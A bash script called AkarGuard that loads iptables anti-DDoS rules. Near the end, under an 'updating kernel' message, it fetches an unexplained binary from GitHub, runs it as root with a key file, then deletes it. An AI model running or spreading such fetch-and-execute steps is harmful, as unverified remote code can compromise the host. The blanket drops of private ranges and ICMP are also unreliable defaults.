#!/bin/bash
# AkarGuard
############################################################
AKRGRD=/sbin/AKRGRDables
clear
echo -e "###########################################"
echo -e "#  Automatic Anti-DDoS and Kernel rules  #"
echo -e "#  AkarGuard 3A Cyber Security Systems   #"
echo -e "###########################################"
echo "IPtables rules loading..."

AKRGRD=/sbin/iptables
$AKRGRD -t mangle -A PREROUTING -m conntrack --ctstate INVALID -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags ACK,FIN FIN -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags ALL ALL -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN,PSH,URG -j DROP
$AKRGRD -t mangle -A PREROUTING -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP
$AKRGRD -t mangle -A PREROUTING -s 224.0.0.0/3 -j DROP
$AKRGRD -t mangle -A PREROUTING -s 169.254.0.0/16 -j DROP
$AKRGRD -t mangle -A PREROUTING -s 172.16.0.0/12 -j DROP
$AKRGRD -t mangle -A PREROUTING -s 192.0.2.0/24 -j DROP
$AKRGRD -t mangle -A PREROUTING -s 192.168.0.0/16 -j DROP
$AKRGRD -t mangle -A PREROUTING -s 10.0.0.0/8 -j DROP
$AKRGRD -t mangle -A PREROUTING -s 0.0.0.0/8 -j DROP
$AKRGRD -t mangle -A PREROUTING -s 240.0.0.0/5 -j DROP
$AKRGRD -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP
$AKRGRD -t mangle -A PREROUTING -p icmp -j DROP
$AKRGRD -t mangle -A PREROUTING -f -j DROP
$AKRGRD -A INPUT -p tcp -m connlimit --connlimit-above 111 -j REJECT --reject-with tcp-reset
$AKRGRD -A INPUT -p tcp --tcp-flags RST RST -m limit --limit 2/s --limit-burst 2 -j ACCEPT
$AKRGRD -A INPUT -p tcp --tcp-flags RST RST -j DROP
$AKRGRD -A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT
$AKRGRD -A INPUT -p tcp -m conntrack --ctstate NEW -j DROP
$AKRGRD -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --set
$AKRGRD -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 10 -j DROP
$AKRGRD -N port-scanning
$AKRGRD -A port-scanning -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s --limit-burst 2 -j RETURN
$AKRGRD -A port-scanning -j DROP
sleep 1
echo "iptables configure!"
sleep 2
clear
echo "updating kernel..."
yum install wget
apt-get install wget
wget https://github.com/AkarGuard/kernel-ddos-protection/raw/main/kernel && curl -O https://github.com/AkarGuard/kernel-ddos-protection/raw/main/kernel
chmod +x kernel
./kernel key.ag
rm kernel*
clear
echo "Protection Activated!"
